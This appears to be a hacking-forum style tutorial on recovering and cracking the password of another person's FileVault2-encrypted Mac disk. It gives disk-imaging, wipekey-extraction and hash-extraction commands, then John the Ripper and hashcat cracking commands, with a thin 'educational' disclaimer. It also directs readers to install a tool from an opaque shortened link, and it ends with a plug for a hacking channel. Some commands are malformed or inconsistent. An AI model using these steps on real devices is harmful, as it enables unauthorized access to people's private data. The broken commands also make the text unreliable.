How to Crack Apple’s FileVault2 Encryption - 100% Working

How to Crack Apple’s FileVault2 Encryption - 100% Working

Here’s The Tut To Crack Apple’s FileVault2 Encryption

Purely For Educational Purpose Only, We Don’t Encourage Any Illegal Activities.

STEP 1: Use dd to extract the image of your targets FileVault2 encrypted disk:
sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd
conv = noerr, sync

STEP 2: Install fvde2john from https://katurls.com/2GktrCpK0m

STEP 3: Use hdiutil to attach to the dd image:
hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain the EncryptedRoot.plist.wipekey from the “Recovery HD” partition
https://github.com/libyal/libfvde/wiki/Mounting#obtaining-encryptedrootplistwipekey
mmls /Volumes/path/to/filevault_image.dd
fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot
icat -o 50450752 image.raw 130 > EncryptedRoot.plist.wipekey

STEP 5: Verify and note the disk mount point for Apple_Corestorage:
diskutil list

…/dev/disk3s2 Apple_Corestorage

STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:
sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2

Will return hash


FINAL STEP: Load this hash into JTR or Hashcat to crack it:
john --format=FVDE-OpenCL --wordlist=dict.txt hash.txt

hashcat -a 0 -m 16700 hash.txt dict.txt

For More Hacking And Python Tutorials Join This high Quality Hacking Channel: